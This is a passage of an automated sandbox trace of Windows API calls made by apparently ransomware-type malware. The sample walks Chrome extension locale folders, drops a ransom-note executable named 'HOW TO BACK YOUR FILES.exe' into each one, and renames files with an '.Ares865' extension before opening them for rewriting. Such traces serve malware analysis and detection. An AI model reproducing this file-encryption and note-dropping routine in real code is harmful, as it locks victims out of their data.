Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859f69d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f1a6be0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f1a6be0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.867] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.867] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.867] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json.Ares865") returned 160 [0103.867] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.869] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.869] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=225) returned 1 [0103.872] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr" [0103.872] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr" [0103.872] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.872] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.873] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.873] GetLastError () returned 0x0 [0103.873] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.874] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859f69d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f1a6be0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f1a6be0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.874] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.874] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.874] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json.Ares865") returned 160 [0103.874] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.875] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.876] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=222) returned 1 [0103.879] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil" [0103.879] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil" [0103.879] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.880] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.880] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.880] GetLastError () returned 0x0 [0103.881] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.881] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859f69d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f1a6be0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f1a6be0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.881] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.881] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.881] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json.Ares865") returned 161 [0103.881] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.882] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.883] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=224) returned 1 [0103.886] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi" [0103.886] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi" [0103.886] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.886] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.887] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.887] GetLastError () returned 0x0 [0103.887] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.887] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859d0870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f1ccd40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f1ccd40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.888] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.888] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.888] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json.Ares865") returned 160 [0103.888] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.889] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.890] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=217) returned 1 [0103.893] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et" [0103.893] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et" [0103.894] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.894] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.894] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.895] GetLastError () returned 0x0 [0103.895] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.895] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859d0870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f1ccd40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f1ccd40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.895] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.895] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.895] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json.Ares865") returned 160 [0103.895] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.896] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.897] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=214) returned 1 [0103.900] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419" [0103.901] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419" [0103.901] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.901] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.901] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.902] GetLastError () returned 0x0 [0103.902] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.902] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859d0870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f1ccd40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f1ccd40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.902] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.902] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.902] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User 